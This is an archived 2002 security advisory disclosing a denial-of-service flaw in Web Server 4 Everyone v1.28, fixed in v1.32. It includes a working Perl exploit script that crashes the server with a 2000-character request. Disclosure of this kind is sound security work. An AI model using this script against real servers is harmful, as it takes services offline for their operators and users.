TUCoPS :: Web :: Servers

TUCoPS :: Web :: Servers :: web5773.htm
WebServer 4 Everyone v1.28 Host Field Denial of Service Vulnerability
24th Oct 2002 [SBWID-5773]
COMMAND

	Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability

SYSTEMS AFFECTED

	Web Server 4 Everyone v1.28

PROBLEM

	-----BEGIN PGP SIGNED MESSAGE----- Hash: MD5
	

	- --[  Web  Server  4  Everyone  v1.28  Host  Field  Denial  of  Service
	Vulnerability ]--
	

	- --[ Type
	

	Denial of Service
	

	- --[ Release Date
	

	October 23, 2002
	

	- --[ Product / Vendor
	

	Web Server 4 Everyone is an Internet and Intranet server  that  supports
	HTTP Services. Web Server 4 Everyone is available for Microsoft
	

	Windows operating systems.
	

	http://www.freeware.lt/Info/projects.php
	

	- --[ Summary
	

	The problem is Web Server 4 Everyone v1.28 with  bounds  checking,  when
	you request 2000 characters "web4all.exe" just shuts down.
	

	This vulnerability also affects Web Server 4 Everyone versions prior  to
	v1.28 for Microsoft Windows 2000.
	

	When the attacker send a request in size of 2000 characters  in  "Host:"
	field that contains all "127.0.0.1", the server  crashes.  In  case  you
	send a request that size without adding the "Host:" there is  no  effect
	on running program. The Web server must be restarted  to  regain  normal
	functionality.
	

	- --[ Exploit
	

	An exploit for this vulnerability exists and is available below.
	 

	=============== SNIP ===============

	

	#!/usr/bin/perl -w

	

	use IO::Socket;

	

	$host = $ARGV[0];

	$port = $ARGV[1];

	$evil = "A" x 2000;

	

	print "Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability by SecurityOffice\n";

	print "Usage: $0 host port\n";

	print "Connecting...\n";

	$socket = IO::Socket::INET->

	            new(Proto=>"tcp",

	            PeerAddr=>$host,

	            PeerPort=>$port)

	            || die "Connection failed.\n";

	

	print "Attacking...\n";

	print $socket "GET /$evil HTTP/1.1\n Host: 127.0.0.1\n\n";

	

	close($socket);

	print "\nConnection closed. Finished.\n\n";

	

	=============== SNIP ===============

	

	

SOLUTION

	

	- --[ Tested

	

	Windows 2000 Sp3 / Web Server 4 Everyone v1.28

	Windows 98 SE / Web Server 4 Everyone v1.28

	

	- --[ Vulnerable

	

	Web Server 4 Everyone v1.28

	

	- --[ Vendor Status

	

	This vulnerability fixed Web Server 4 Everyone v1.32
	

	- --[ Disclaimer

	

	http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the

	information and/or the software listed on this

	

	security advisory.

	

	- --[ Author

	

	Tamer Sahin

	ts@securityoffice.net

	http://www.securityoffice.net

	

	All our advisories can be viewed at http://www.securityoffice.net/articles/

	

	Please send suggestions, updates, and comments to feedback@securityoffice.net

	

	(c) 2002 SecurityOffice

	

	This Security Advisory may be reproduced and distributed, provided that this Security Advisory is

	not modified in any way and is

	

	attributed to SecurityOffice and provided that such reproduction and distribution is performed

	for non-commercial purposes.

	

	Tamer Sahin

	http://www.securityoffice.net

	

	-----BEGIN PGP SIGNATURE-----

	Version: 2.6

	

	iQEVAwUAPbZnkvpL5ibJRTtBAQHxWAf/dWgBrrq5E6tlSZ3kN5dL/Kwf5G5bnwIc

	0hP5pc0xd1qozr5SBtAtvCpAaDAROzjcIRoOKXnEG2wPkJFb71lN4wKdxqrM1tL1

	1sjuimEeWPE4AIs4GCfRN/XtOzq4fdv+Oc/W7WgLzNIGkB9+zeb/L0XAQu/uPL/r

	4Jt6qg7VBKhsFfB0iHv6nSPEtkJzWFmsLJ/SKIT2bXTd0DRSSrW6w6WDygFHytVk

	VC4+7EGFu1MoEYbnpPRHr0RKQO2esc8iv026H5Uet2mzpxL520wACuBnB1mKuLAa

	yHsk6PQoFJypOarWEdMc6EevWamK4x/9VWuLM+i0/LM61TgNAqpT8Q==

	=jEpl

	-----END PGP SIGNATURE-----